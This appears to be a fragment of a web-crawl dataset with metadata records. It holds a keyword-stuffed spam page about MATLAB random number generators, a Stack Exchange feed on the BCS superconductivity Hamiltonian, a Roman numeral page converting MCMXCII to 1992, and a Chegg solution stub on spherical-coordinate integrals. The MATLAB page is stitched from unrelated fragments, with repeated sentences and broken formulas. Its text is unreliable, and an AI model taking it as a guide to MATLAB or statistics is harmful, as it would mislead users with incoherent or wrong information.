step-by-step knowledge and information about probability and statistics. C/C++ Code Generation Generate C and C++ code using MATLAB® Coder™. Learn more about random number generatorI want to generate a set of random numbers between 0 and 1, but able to alter the weighting of these numbers. X = rand(___, typename ) returns an array of random numbers of data type Use rand, randi, randn, and randperm to create arrays of random numbers. The syntax is randi([start,end]). MATLAB 4 used random number generators with a single seed. Well, if I could generate EVEN random numbers within an interval, then I'd just add 1. Random strings can be unique. This program is intended to be especially quick with very large ranges of integers and selecting only a very small number of those integers. The first column should contain random values between [0 5] and the second column should have random values between [5 20]. 2017/10/15 · In this video I try to show you how to generate random number with specific range, integer random number, and apply permutation random number on Matlab. I am trying to generate 12*2 matrix. Random Number Generators, Mersenne Twister Posted by Cleve Moler , April 17, 2015 This is the first of a multi-part series about the MATLAB random number generators. Every time a random number is generated, the state of the random number generators change. Learn more about random number generatorNon-repeating random integer generator with a seed. How to generate two random numbers α, β ~ U[-1,+1] if β ≥ α?. r = randi([10 50],1,5) r = 1×5 43 47 15 47 35 Random Complex Numbers. Generate random numbers with a given distribution. About random number generators. wearenotcertain in their outcome. Generating random integer between negative and positive range in MATLAB 4 Is there a way in Matlab using the pseudo number generator to generate numbers within a specific range? All the random number functions, rand, randn, randi, and randperm, draw values from a shared random number generator. Learn more about random number generatoring random number generators the default behavior of the function rand in Matlab versions between 5 (1995) and 7. Processing is a flexible software sketchbook and a language for learning how to code within the context of the visual arts. Random Generate Random Numbers That Are Repeatable. You can use the randperm function to create arrays of random integer values that have no repeated Hi How to generate 20 random numbers in range from (0. MATLAB Answers Create Arrays of Random Numbers. For these distributions there are functions available directly like poissrnd for Actually the number of particles has been limited to 1277. 6 that are distributed with a variance of 0. But I seem to struggle on how to generate random points to be plotted onto my image. You want to generate random numbers. To generate a different sequence of random numbers we use a \"seeding\" function. About random number generators. Maybe you didn't write a function but just wrote a script. Random Number Generation via Linear Congruential Generators in C++ By QuantStart Team In this article we are going to construct classes to help us encapsulate the generation of random numbers. I tried the intrinsic functions, 'randn'. create. You probably have played mazes before, especially in your childhood. Chapter 1 Random number generators and random processes Ifwelookaround,wenoticethatmanyprocessesarenondeterministic,i. Learn more about random number generatorRandom Password Generator. Computational Physics Video 29 - Generating Random Walks using MATLAB Hywel Owen. Random Number Generation Norm Matloff February 21, 2006 c 2006, N. randomArray = A + (B-A)*rand(1,5); If we tried A=1, B=10, This feature is not available right now. Performance degradation of random number Learn more about random number generator, performance issue, r2013a, performance, random MATLAB, Statistics and Machine Learning Toolbox Select a Web Site. This code uses Math. Create a simple M-file function like this: function rngc(s) %#codegen Mid Square Method Code implementation in C and MatLab: Mid Square Method Code implementation in C and MatLab Problem: Mid square method, mid square random number generator Code in MatLab and C or C++. let say i wanna have 5 strings of the number. For example, to generate a 5-by-5 array of random numbers with a mean of . And the sum of the numbers is very big, 87, 73 130 Clock Time Generator will pick random times of the day Calendar Date Generator will pick random days across nearly three and a half millennia Geographic Coordinate Generator will pick a random spot on our planet's surface Bitmaps in black and white Hexadecimal Color Code Generator will pick color codes, for example for use as web colorsRandom number generator for continuous and discrete distributionsMathWorks Machine Translation. Learn more about random number generator, speed, cpu time. But finally, I found it is not true random number generators. for generating sample numbers at random from any probability distribution given its cumulative distribution function (cdf). Then, use it $1024$ times to get $2048$ random numbers which will, with high probability, have a sample mean of $0$ and sample variance of $1$. random: Generate random integer numbersRandom numbers - MATLAB random - mathworks. Random Numbers in MATLAB. rng('default') puts the settings of the random number generator used by rand, randi, and randn to their default values. rand(1)×(b-a)+a Introduction to Simulation Using MATLAB A. hi guys , i recently wanted to compute the constellation for my 16 qam signal. ) in R. When you create random numbers using software, the results are not random in a strict, mathematical sense. Speeding up simulation in Matlab using gpuArrays. Both Rayleigh and Rician noise generators are shown in the example. For that, first i need to generate a input sequence composed of independent random numbers {?(I,J)}. randperm uses the same random number generator as rand , randi , and randn . Purely Random 1's and 0's. I am trying to create a random number generator between two numbers in MatLab but I am unable to figure out the correct equation. You could try to use MATLAB's twister instead of the default generator and use python's builtin random. \" They are, in fact, entirely deterministic. For these distributions there are functions available directly like poissrnd forI am trying to make a matrix that generates random numbers but each column is associated with a different variable. htmlMathWorks Machine Translation. Covers topics such as probability and statistics in Matlab, Python and Java, Stochastic Processes, Anomaly detection, different distributions and more! Pseudo-Random Number Generators Part of the postgraduate journal club series, Mathematics, UQ The following is the Matlab code used to generate the figure, which And there's nothing wrong with that - if the random number generators in MATLAB are doing their job correctly (and in R2008b, you have a choice among three generators based on state-of-the-art algorithms), you should be able to just generate random numbers using rand, randn or randi, and treat everything they return as independent random values. MATLAB . Hi Azzi, The maximale distance between two impulses may be 2 ms, for example. The utility generates a sequence that lacks a pattern and is random. possible duplicate of MATLAB generate random numbers – …rng('default') puts the settings of the random number generator used by rand, randi, and randn to their default values. (Matlab has two generators-- 'rand' and 'randn'-- for uniform and normal random numbers, respectively. Learn more about generate, random, signal, random signal, generate random signalQuestion about random generator?. 7891 etc. Jan 5, 2012 Send me your queries at satendra. This example shows Random number generator for continuous and discrete distributions. Generate Random Numbers. Pursuit Curves. By default, its range Could anybody tell me that How one can generate a random singular matrices using matlab? I know that using rand(n) we can generate a random matrix of order n. Then, the relay node demodulates them and performs some network coding operations. 2 General Techniques for Generating Random Variables Most methods for generating random variables start with random numbers that are uniformly distributed on the interval . To ensure that the model uses different initial seeds, set the Simulate using parameter to Interpreted execution, and Run the command by entering it in the MATLAB Command Window. The objective is to demonstrate the principal idea of getting random bits, i. Generating random integer between negative and positive range in MATLAB 4 Is there a way in Matlab using the pseudo number generator to generate numbers within a specific range? Create Arrays of Random Numbers. This is an important tool if you want to generate a unique set of strings. For the purposes of this course, you will most likley not need to \"seed\" your random number generator. The reason why the command rand(10,1) will always return the same 10 numbers if executed on startup is because MATLAB always uses the same seed for its pseudorandom number generator (which at the time of writing is a Mersenne Twister) unless you tell it to do otherwise. Inverse transform sampling (also known as inversion sampling, the inverse probability integral transform, the inverse transformation method, Smirnov transform, golden rule, etc. I generate 10000 random numbers, found the mean of them are not near 0, some cases the mean are 0. Suggesting to read the help text is a very strong idea, because it helps in nearly all future problems also. :) That is not as silly as it sounds. Learn more about random number generator Matlab has some built-in functions that you can use to generate a uniform distribution of both continuous numbers as well as integers. 2. They may produce different results according to the implementation. asked Feb 22 '11 at 11:57. Is there any way to generate pseudo-random numbers to less precision and thus speed the process up? Speed up random number generation in MATLAB. 891 7 24 36. How can I generate a random number in MATLAB between 13 and 20? Amro. Learn more about binary, matrix, randomlyAs a Mathworks site states about random number generators, \"the results are not random in a strict, mathematical sense. We will denote these random variables by the letter U. where MATLAB code that reseeded or read/wrote the state of MATLAB's random number generator using the pre-R2008b Hi Azzi, The maximale distance between two impulses may be 2 ms, for example. Use rand, randi, randn, and randperm to create arrays of random numbers. The integers are drawn from a uniform distribution to make selection of integers equally probable. The generated numbers have been shown to pass the NIST tests for RNGs. Rakhshan and H. I did verify that I got the same sequence of numbers from poissrnd after setting the seed like this. 8 years, 1 Random number generator between two numbers - MatLab. Random number generator (included) An additional random generator (which is considerably faster) is a PCG, though it is not cryptographically strong. Learn more about generate, random, signal, random signal, generate random signal Generate Random Numbers That Are Repeatable Specify the Seed. Free gaussian random number generators, uniform random number generators, random binary code generators and more. random generators matlabUse rand , randi , randn , and randperm to create arrays of random numbers. USING MATLAB •Create a script that will. The next generation is produced using ga operators that also use these same random number generators. random() method, which returns pseudo-random number in a range 0. Generate Random Numbers That Are Repeatable Specify the Seed. Matloff Contents 1 Uniform Random Number Generation 2 2 Generating Random Numbers from Continuous Distributions 3About random number generators. Language Specific Functions. This form allows you to generate random passwords. ORG - Introduction to Randomness and Random …https://www. And there's nothing wrong with that - if the random number generators in MATLAB are doing their job correctly (and in R2008b, you have a choice among three generators based on state-of-the-art algorithms), you should be able to just generate random numbers using rand, randn or randi, and treat everything they return as independent random values. Visual Basic, and Matlab so that they can This reminded me of the one of the first times I played with the Julia language where I learned that Julia’s random number generator used a SIMD-accelerated implementation of Mersenne Twister called dSFMT to generate random numbers much faster than MATLAB’s Mersenne Twister implementation. The randomness comes from atmospheric noise, which for many purposes is better than the pseudo-random number algorithms typically used in computer programs. Hi Azzi, The maximale distance between two impulses may be 2 ms, for example. It can be physical or computational, and can be used with any set of numbers or symbols. This example shows Random number generator for continuous and discrete distributions. org's Random Integer Generator. Please try again later. I want to generate a random number with a given probability but I'm not sure how to: I need a number between 1 and 3. I assume there should be sth wrong with the function rand and the way it generates random numbers. If you have Matlab Coder, you can see the underlying C code (or something fairly close) used by rng() to seed the default uniform random number generator. Hi, everyone. com/help/symbolic/random-number-generators. Also filter by part of speech! Random Movies » Good movies are hard to find. if you are looking to generate all the number within a specific rang randomly then you can I have to agree with the other answers, stating that these generators are not \" absolute\". This example shows how to repeat arrays of random numbers by specifying the seed first. If the optional calling argument is missing, initrandn() prompts the user to enter a seed interactively. However, software applications, such as MATLAB ®, use algorithms that make your results appear to be random and independent. I need to generate a Random Binary Sequence of 1x10000 size. Learn more about random number generatorRandom Number Generation Norm Matloff February 21, 2006 c 2006, N. % this function generates a random unitary matrix of order 'n' and verifies function [U,verify I want to generate a random number generator 0 to 1 should include values with ten decimal points. Mike Croucher as an interesting post on correctly and incorrectly setting up the seed in Matlab. Gold Member So I ran an ODE solver with an additional, random (using randn) injected input. For uniformly distributed (flat) random numbers, use runif(). See above for what to do next. is to just generate too many random samples, then throw away This feature is not available right now. Is there any way to use it for Chapter 1 Random number generators and random processes Ifwelookaround,wenoticethatmanyprocessesarenondeterministic,i. There are four fundamental random number functions: rand, randi, Run the command by entering it in the MATLAB Command Window. My first intention was to just generate two vectors and only take the ones which satisfy β ≥ α and discard the rest. 8. 007 . First, we will generate an LFSR in Matlab which also creates a results file. Extended Capabilities C/C++ Code Generation Generate C and C++ code using MATLAB® Coder™. Learn more about decimal random number generator MATLAB Use the random number generation user interface randtool to generate random numbers interactively. The main program is \"Tree_Generator_main. Open up a fresh copy of a recent version of MATLAB and ask it about the random number generator it’s using generator is published at among Technical Solutions for Matlab as Solution Number 1- 10HYAS, where the problem is demonstrated using a sequence of 5·10 7 consecutive random numbers obtained using the default setting of rand. Pseudo random number How to choose a seed for generating random numbers in SAS 7. And the sum of the numbers is very big, 87, 73 130 Generating random numbers using for loop. m\" Once you open this program, you can choose between 4 types of branchings. Generate values from the uniform distribution on the interval [a, b]:Speed improvement of the random generator. 4321, 3. Now, lets assume a sampling frequency of 10 kHz and you are generating 5 periods of the cosine. Can you generate random integers? If you could, why not multiply by 2? Then you would have EVEN random integers. Learn more about random numbers, seedPreviously Matlab was using the Lehmer algorithm to generate pseudo random numbers for Uniform Distribution Lehmer also invented the multiplicative congruential algorithm, which is the basis for many of the random number generators in use today. So I type randi([-10,10]) on the Octave command line I get a random number between -10 and 10 as an output, In this case it was -4. RandStream. Choose a web site to get translated content where available and see local events and offers. Between the 2 sets of code there is inherent variability due to the random number generator. Use the random number generation user interface randtool to generate random numbers interactively. in/ for more info. And the sum of the numbers is very big, 87, 73 130 generating random signal. The sequence of numbers produced by rand is determined by the internal settings of the uniform pseudorandom number generator that underlies rand, randi, and randn. Learn more about random generatorI need to generate a Random Binary Sequence of 1x10000 size. How to set custom seed for pseudo-random number generator. Generating Random Numbers on a GPU. Hi everyone: I am trying to generate true random number by MATLAB. It is not very good at all by modern standards! A closer look. The simplest randi syntax returns double-precision integer values between 1 and a specified value, imax. Can anyone please tell me on how to generate random inters every time my program passes through the loop. For instance, rand(1000,20) will give you a matrix of the desired size that is uniformly distributed on 0 to 1. 1 intervals? Sample random numbers are like 5. 3 (2006b). This topic introduces random numbers in MATLAB ®. Random integer generators in source subsystems generate frames of bits, modulate and forward them to the relay node. and to reinitialize it with the seed 54321, you use this. Learn more about random number generator, mean, standard-deviation MATLABgenerate random numbers in range from (0. I am generating data in R and Matlab for 2 separate analyses and I want to determine if the results in the two systems are equivalent. Contents In Matlab, when drawing random values from distributions, There is a simple way to “seed” the random number generators to insure that they produce the same sequence. How can we generate (in Matlab) complex random vectors which are distributed according to the proper complex distribution $\\mathcal{CN}(\\vec\\mu, \\Sigma)$, where $\\vec\\mu$ is mean and $\\Sigma$ is complex hermitian positive definite matrix (lets assume that pseudo-covariance is zero)? However, the random number generator it switches to this time is an even older one that was introduced as far back as MATLAB version 4. rand (Matlab function) then Matlab returns a A*A random matrix but in Scilab you get a single random To get the state of the uniform generator, in Matlab you Hi! I just need to generate random numbers that follow some distribution like poisson, exponential,normal,etc. Random Number Generators, Mersenne Twister Posted by Cleve Moler , April 17, 2015 This is the first of a multi-part series about the MATLAB random number generators. Based on your location, we recommend that you select: . list lists all the generator algorithms that can be used when creating a random number stream with RandStream or RandStream. Pythagorean. Generate a uniform distribution of random numbers on a specified interval [a,b]. below is the example of the matrix that i need. Suppose you configure a MATLAB uniform random number stream (or use the default). The key takeaway is that one should not use rand('seed',x) or rand algorithms and MATLAB code for generating random variables for some useful distributions. Previously Matlab was using the Lehmer algorithm to generate pseudo random numbers for Uniform Distribution Lehmer also invented the multiplicative congruential algorithm, which is the basis for many of the random number generators in use today. 0)About random number generators. According to random. Statistically, random numbers exhibit no predictable pattern or regularity. rng default. Learn more about random number generatorAvoid repetition of random number arrays when MATLAB restarts. Aug 28, 2013 One way to ensure the same numbers are fed to your process is to generate them in one of the two languges, save them and import into the Generate values from the uniform distribution on the interval [a, b]. You generate a random array of numbers. 04,0. I've come out with a solution, but I need this to be lighter. Speed improvement of the random generator. However I doubt that you'll be able to reproduce exactly the same results. In this chapter, we present basic methods of generating random variables and simulate prob-Random number generator for continuous and discrete distributionsGenerate an integer between 1 and n; Generate an integer between 1 and n-1, this is the choice out of the available integers. I know it can be generated by transforming gamma variables, but what I want is a subroutine, or a generator, which can directly geneate Dirichlet random vectors such as MCMCpack::rdirichlet(. Since 2001, Processing has promoted software literacy within the visual arts and visual literacy within technology. Variants: What Are Your Options in R2018b? For example, to reinitialize MATLAB's random number generator to its default settings, you use this command. The randi function returns double integer values drawn from a discrete uniform distribution. g. Orange Box Ceo 1,220,696 views generate n random number between two numbers Learn more about random numbers generator, exponential distribution, random . Without loss of generality, let the two outcomes be labeled 0 and 1. Loading Unsubscribe from Hywel Owen? A Random Walk & Monte Carlo Simulation | Here is a code snippet, which can be used to generate random numbers in a range between 0 to 10, where 0 is inclusive and 10 is exclusive. asked. Avoid repetition of random number arrays when MATLAB restarts. Ask Question 37. This is the third in a multi-part series on the MATLAB random number generators. Random Noise Generators. Why She Loves MATLAB. org/randomnessIntroduction to Randomness and Random Numbers. Solution. they are big. Learn more about random number generator, mean, standard-deviation MATLAB@ Walter Roberson I need to generate some random data but when i am plotting them the minimum distance between those 2 points shoul be 2 meter and maximum distance between those 2 points should be 3. The available generator algorithms and their properties are given in the following table. Create Arrays of Random Numbers. rng('default') puts the settings of the random number generator used by rand, randi, and randn to their default values. Learn more about random number generator, while loop generating random signal. MATLAB Answers Loren on the Art of MATLAB. Using the previous version of populating \"W\" (last 7 lines of the code) it only used to take 1. random number generator. I believe all the random number generators work off of the stream, but I am not 100% sure of that. Suppose you want two choices with equal probability, so 1/2 each. MATLAB Answers ™ MATLAB Central Generating random numbers from 0 - 1 with limit on the sum. How can I set the seed on my own, so every time I run this test I will get the same results? Browse other questions tagged matlab random or ask your own question. matlab -nodisplay -nodesktop -r \"generate_matlab_randoms\" python python_randoms. R = RANDOM(NAME,A) returns an array of random numbers chosen from theHi Azzi, The maximale distance between two impulses may be 2 ms, for example. This generator was introduced in 1999 and has been widely tested and used. This can be avoided by using the rng function: by calling this, we can set another state on the random number generator, or get the current state of it. Every time you initialize the generator using the same seed, you always get the same result. EngineeringStudents) submitted 3 years ago by night_lilim My assignment asks me to write a script that will roll two dice 10 times and add the result for each roll together. 25 & Generate Random Numbers That Are Repeatable Specify the Seed. MATLAB has used variants of George Marsaglia's ziggurat algorithm to generate normally distributed random numbers for almost twenty years. Learn more about random numbers, seed@ Walter Roberson I need to generate some random data but when i am plotting them the minimum distance between those 2 points shoul be 2 meter and maximum distance between those 2 points should be 3. Loren on the Art of MATLAB. Write a Matlab script that samples two sets of 10 random values drawn from a uniformi want to introduce an interval for frequency and an interval for amplitude to matlab to make a random signal My input data are only shapes of this two functions and my idea is to generate A random number table is a listing of random numbers where we can choose the quantity of random numbers desired, the maximum and minimum values of numbers in the table, and whether or not duplicate numbers are allowed. Pishro-Nik 12. What kind of randomness do you want? There are many ways to generate a random variable. Learn more about generate, random, coordinates, circle randperm performs k-permutations (sampling without replacement). By default, ga starts with a random initial population which is created using MATLAB® random number generators. 0 to 1. Generating Random Numbers on a GPU Open Script This example shows how to switch between the different random number generators that are supported on the GPU and examines the performance of each of them. Steve on Image Processing. ) is a basic method for pseudo-random number sampling, i. This MATLAB function seeds the random number generator using the Jan 5, 2012 Send me your queries at satendra" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8469637,"math_prob":0.97768664,"size":52470,"snap":"2019-51-2020-05","text_gpt3_token_len":11020,"char_repetition_ratio":0.25304008,"word_repetition_ratio":0.25434273,"special_character_ratio":0.20747094,"punctuation_ratio":0.10646663,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99677813,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-07T17:05:50Z\",\"WARC-Record-ID\":\"<urn:uuid:043858bf-ba57-4d6a-81b9-0a5437db7042>\",\"Content-Length\":\"61059\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2fb472e1-940a-49a0-b4e1-a20d67d88478>\",\"WARC-Concurrent-To\":\"<urn:uuid:380060ca-4e0e-4c28-809e-7466c468952f>\",\"WARC-IP-Address\":\"41.185.8.138\",\"WARC-Target-URI\":\"http://pharmaqforms.co.za/o6rf80n/random-generators-matlab.php\",\"WARC-Payload-Digest\":\"sha1:EGOPCIANSLAHSCIUMTQLNWJWFQ3TS73N\",\"WARC-Block-Digest\":\"sha1:2DCYDUOD5WQN3JOM22ZZBVMVIBWL3RJR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540500637.40_warc_CC-MAIN-20191207160050-20191207184050-00262.warc.gz\"}"}
https://physics.stackexchange.com/feeds/question/186992
[ "Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") - Physics Stack Exchange most recent 30 from physics.stackexchange.com 2019-09-17T14:50:09Z https://physics.stackexchange.com/feeds/question/186992 https://creativecommons.org/licenses/by-sa/4.0/rdf https://physics.stackexchange.com/q/186992 1 Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") ApproximatelyTrue https://physics.stackexchange.com/users/81055 2015-05-31T15:49:00Z 2016-02-18T01:25:29Z <p>I've been reading up about the BCS theory of superconductivity, and the treatments I've seen begin rather mysteriously with a Hamiltonian that (in the language of second quantization) looks something like this: $$\\mathcal{H}=\\sum_{\\vec k\\sigma}\\xi_{\\vec k}c_{\\vec k\\sigma}^{\\dagger}c_{\\vec k\\sigma}+\\sum_{\\vec k\\vec l}g_{\\vec k\\vec l}c_{\\vec k\\uparrow}^{\\dagger}c_{-\\vec k\\downarrow}^{\\dagger}c_{-\\vec l\\downarrow}c_{\\vec l\\uparrow},$$ where $\\sigma \\in \\{\\uparrow,\\downarrow\\}$ labels possible spin states of an electron, $c_{\\vec k\\sigma}^{\\dagger}$(respectively $c_{\\vec k\\sigma}$) creates (respectively annihilates) an electron of momentum $\\vec k$, $\\xi_{\\vec k}\\equiv\\epsilon_{\\vec k}-\\mu$ is the kinetic energy of an electron of momentum $\\vec k$ measured relative to the chemical potential $\\mu$ and $g_{\\vec k,\\vec l}$ is the coupling strength of a (phonon mediated) interaction between an electron of momentum $\\vec k$ and an electron of momentum $\\vec l$.</p> <p>Now the first, \"kinetic\" term represents the kinetic energy of the electrons after accounting for the band structure, and I think I understand it alright. I have some doubts regarding the second \"interaction\" term.</p> <ol> <li>How do we compute $g_{\\vec k,\\vec l}$? Are there models which allow us to explicitly see how properties of the lattice (e.g. isotope mass) affect the strength of the interaction? Or do we simply extract it from experimental measurements?</li> <li>I'm relatively new to the language of second quantization, so could someone explain to me why this sequence of creation and annihilation operators (in this particular order) describes a phonon mediated interaction between an electron of momentum $\\vec k$ and an electron of momentum $\\vec l$?</li> <li>It seems like we're only including terms corresponding to interactions between pairs which have total spin 0. (Am I reading this term wrong somehow?) Why can't we have spin-1 quasiparticles condensing into a charge carrying \"superfluid\" ground state?</li> </ol> https://physics.stackexchange.com/questions/186992/-/186996#186996 1 Answer by akhmeteli for Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") akhmeteli https://physics.stackexchange.com/users/6974 2015-05-31T16:16:04Z 2015-05-31T16:16:04Z <ol> <li>The BCS Hamiltonian is derived from a Hamiltonian describing, in particular, electron-phonon interaction. I read the (rather cumbersome) derivation in A.S. Davydov's \"Quantum Mechanics\", but I am sure it can be found in many other places.</li> </ol> https://physics.stackexchange.com/questions/186992/-/238031#238031 1 Answer by JakeA for Questions concerning BCS theory (particularly the \"pairing Hamiltonian\") JakeA https://physics.stackexchange.com/users/104887 2016-02-18T01:25:29Z 2016-02-18T01:25:29Z <p>It might make more sense to address your questions in non-numerical order.</p> <p>To answer your second question, this isn't an interaction between an electron with momentum $k$ and another with momentum $l$. It describes the scattering of two electrons with opposite spin and momenta $\\pm l$ to momenta $\\pm k$. You destroy an up electron with momentum $l$ and a down electron with momentum $-l$ and create an up electron with momentum $k$ and a down electron with momentum $-k$.</p> <p>Addressing your third question, this model is based upon the assumption that the electrons pair with opposite momentum and opposite spin. That is, that the Cooper pair has a net spin of zero and a net momentum of zero. This does not necesarily have to be the case, but was assumed to be the case in BCS theory. There are a few justifications for making this initial assumption:</p> <ol> <li><p>Typical phonon energies are much smaller than the Fermi energy. This means that an iteraction with a phonon will only scatter electrons within a thin shell around the Fermi-surface. If you imagine two rings. Their overlap is greatest when they are centred on each other and rapidly decreases as they are seperated. The cross-section for interaction with phonons is large if the momentum is zero.</p></li> <li><p>If you are looking for a lowest energy configuration, the zero-momentum and zero-spin case seems like a sensible start.</p></li> </ol> <p>As for the form of $g_{kl}$, there isn't an all-encompasing theory in the same way that we can calculate band structures very accurately from atomic positions. There are, of course, theories for calculating general coupling strengths. Eliashberg theory, in brief, takes the electronic and phononic densities and computes a coupling strength based upon the probabilites of scattering from one electronic state to another via a phonon.</p> <p>You need to look further into triplet pairing and p-wave superconductivity to hear more about spin-1 pairs. Its a hugely active area of research and I think it is fair to say that the jury is out on whether it is actually realised in the candidate materials.</p>" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8367689,"math_prob":0.935606,"size":5404,"snap":"2019-35-2019-39","text_gpt3_token_len":1355,"char_repetition_ratio":0.124814816,"word_repetition_ratio":0.06267806,"special_character_ratio":0.25166544,"punctuation_ratio":0.101123594,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958643,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-17T14:50:09Z\",\"WARC-Record-ID\":\"<urn:uuid:2c803f90-58d1-48fb-8146-96b72b01ea95>\",\"Content-Length\":\"8850\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5a1beb04-9fa2-4393-aa2e-e27b08947f23>\",\"WARC-Concurrent-To\":\"<urn:uuid:a1c328ba-0aec-438d-ac39-87d374b03d77>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/feeds/question/186992\",\"WARC-Payload-Digest\":\"sha1:UW7F4TBRGC7T3W45THGJJHX2IY4FYSZ2\",\"WARC-Block-Digest\":\"sha1:U3EJWMDMOWPZXLB3QNGBNV6W62P65KU6\",\"WARC-Identified-Payload-Type\":\"application/atom+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573080.8_warc_CC-MAIN-20190917141045-20190917163045-00266.warc.gz\"}"}
http://www.romannumerals.co/numerals-converter/mcmxcii-in-numbers/
[ "## What number is \"MCMXCII\"?\n\n### A: 1992\n\nMCMXCII = 1992\n\nYour question is, \"What is MCMXCII in Numbers?\". The answer is '1992'. Here we will explain how to convert, write and read the Roman numeral letters MCMXCII in the correct Arabic number translation.\n\n## How is MCMXCII converted to numbers?\n\nTo convert MCMXCII to numbers the translation involves breaking the numeral into place values (ones, tens, hundreds, thousands), like this:\n\nPlace ValueNumberRoman Numeral\nConversion1000 + 900 + 90 + 2M + CM + XC + II\nThousands1000M\nHundreds900CM\nTens90XC\nOnes2II\n\n## How is MCMXCII written in numbers?\n\nTo write MCMXCII as numbers correctly you combine the converted roman numerals together. The highest numerals should always precede the lower numerals to provide you the correct written translation, like in the table above.\n\n1000+900+90+2 = (MCMXCII) = 1992\n\n## More from Roman Numerals.co\n\nMCMXCIII\n\nNow you know the translation for Roman numeral MCMXCII into numbers, see the next numeral to learn how it is conveted to numbers.\n\nConvert another Roman numeral in to Arabic numbers." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7846369,"math_prob":0.95352703,"size":1098,"snap":"2023-40-2023-50","text_gpt3_token_len":312,"char_repetition_ratio":0.18190128,"word_repetition_ratio":0.0,"special_character_ratio":0.2641166,"punctuation_ratio":0.11,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96551704,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-03T23:48:10Z\",\"WARC-Record-ID\":\"<urn:uuid:5f65b473-a911-43a5-9e93-b8a2addae8df>\",\"Content-Length\":\"76085\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3b871825-2223-4ee6-9e01-dc1e5e35ac07>\",\"WARC-Concurrent-To\":\"<urn:uuid:4f1fb06a-f4f5-4c59-b86f-91380aa58ea8>\",\"WARC-IP-Address\":\"162.210.102.46\",\"WARC-Target-URI\":\"http://www.romannumerals.co/numerals-converter/mcmxcii-in-numbers/\",\"WARC-Payload-Digest\":\"sha1:IMBJCN5SR25BJ7RTOQJVWYTD7GIDNHJ2\",\"WARC-Block-Digest\":\"sha1:BMOENSTJJIBEWB6SZMJF76PNV2PEJWSL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100518.73_warc_CC-MAIN-20231203225036-20231204015036-00694.warc.gz\"}"}
https://www.chegg.com/homework-help/changing-order-integration-spherical-coordinates-previous-in-chapter-15.7-problem-29e-solution-9780321730787-exc
[ "Skip Navigation", null, "# Thomas' Calculus, Early Transcendentals, Books a la Carte Edition (12th Edition) Edit edition Problem 29E from Chapter 15.7: Changing the Order of Integration in Spherical Coordinates ...\n\nWe have solutions for your book!\nChapter: Problem:\n\nChanging the Order of Integration in Spherical Coordinates\n\nThe previous integrals suggest there are preferred orders of integration for spherical coordinates, but other orders give the same value and are occasionally easier to evaluate. Evaluate the integrals in Exercise", null, "Step-by-step solution:\n75%(8 ratings)\nfor this solution\nChapter: Problem:\n• Step 1 of 3\n\nThe integral is", null, ".\n\nThe objective is to evaluate the integral by changing the order of integration.\n\nSince the limits of integration are constants, the other order of integration gives the same value.", null, "", null, "• Chapter , Problem is solved.\nCorresponding Textbook", null, "Thomas' Calculus, Early Transcendentals, Books a la Carte Edition | 12th Edition\n9780321730787ISBN-13: 032173078XISBN:\nThis is an alternate ISBN. View the primary ISBN for: Thomas' Calculus Early Transcendentals 12th Edition Textbook Solutions" ]
[ null, "https://cs.cheggcdn.com/covers2/20500000/20500993_1307601438_Width200.jpg", null, "https://mgh-images.s3.amazonaws.com/9780321998002/508937-15.7-29EEI1.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i1.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i2.png", null, "https://chegg-html-solutions.s3.amazonaws.com/9780321884077/13217-15.7-29E-i3.png", null, "https://cs.cheggcdn.com/covers2/20500000/20500993_1307601438_Width200.jpg", null ]
